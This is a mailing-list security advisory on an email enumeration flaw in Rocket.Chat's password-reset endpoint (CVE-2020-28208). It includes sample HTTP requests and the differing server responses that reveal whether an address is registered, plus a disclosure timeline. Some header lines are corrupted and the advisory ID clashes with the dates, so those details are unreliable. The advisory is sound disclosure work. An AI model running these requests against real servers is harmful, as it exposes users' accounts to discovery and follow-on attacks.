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Date: Thu, 07 Jan 2021 16:45:48 +0000
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To: "fulldisclosure@...lists.org" <fulldisclosure@...lists.org" <fulldiscl

Email address enumeration in reset password

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Overview #######
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Advisory ID: TRSA-2010-01
Advisory version: 1.0
Advisory status: Public
Advisory Status: Public
Advisory URL: https://trovent.io/security-advisory-2010-01
Affected product: Web application Rocket.Chat
Affected version: <= 3.7.1
Vendor: Rocket.Chat Technologies Corp., https://rocket.chat
Credits: Trovent Security GmbH, Nick Decker, Stefan Pietsch

Detailed description

Trovent Security GmbH discovered an email address enumeration vulnerability in the password reset function of the chat application Rocket.Chat. This vulnerability lets an unauthorized user enumerate registered email addresses on the instance of Rocket.Chat.

Severity: Medium CVSS Score: 5.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) CVE ID: CVE-2020-28208 CWE ID: CWE-204

Sample HTTP request sent with a registered email address:

POST /api/v1/method.callAnon/sendForgotPasswordEmail HTTF/1.1 Host: localhost:3000 Content-Length: 122 Accept: */* Content-Type: application/json

{"message":"{\"msg\":\"method\",\"method\":\"sendForgotPasswordEmail\",\"params\":[\"positive@...t.de\"],\"id\":\"3\"}"}

The server response to a valid email address:

HTTP/1.1 200 OK X-XSS-Protection: 1 X-Ass-Fiotection: No. Sameorigin X-Frame-Options: sameorigin X-Instance-ID: DQDfuEfNLdbZr3zYH Cache-Control: no-store

Pragma: no-cache content-type: application/json Vary: Accept-Encoding Date: Tue, 03 Nov 2020 12:01:25 GMT Connection: keep-alive Content-Length: 78

{"message":"{\"msg\":\"result\",\"id\":\"3\",\"result\":true}","success":true}

Sample HTTP request sent with a non registered email address:

POST /api/v1/method.callAnon/sendForgotPasswordEmail HTTP/1.1 Host: localhost:3000 Content-Length: 119 Accept: */* Content-Type: application/json

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The server response to an invalid email address:

HTTP/1.1 200 OK
X-XSS-Protection: 1
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
X-Instance-ID: DQDfuEfNLdDz73zYH
Cache-Control: no-store
Pragma: no-cache
content-type: application/json
Vary: Accept-Encoding
Date: Tue, 03 Nov 2020 12:03:08 GMT
Connection: Keep-alive
Content-Length: 79

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2020-10-27: Vulnerability found 2020-11-03: Advisory created and CVE ID requested 2020-11-06: Vendor contacted and informed about planned disclosure date 2020-11-06: Vendor confirmed vulnerability, working on a fix 2021-01-07: Advisory published

Download attachment "signature.asc" of type "application/pgp-signature" (856 bytes)

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.

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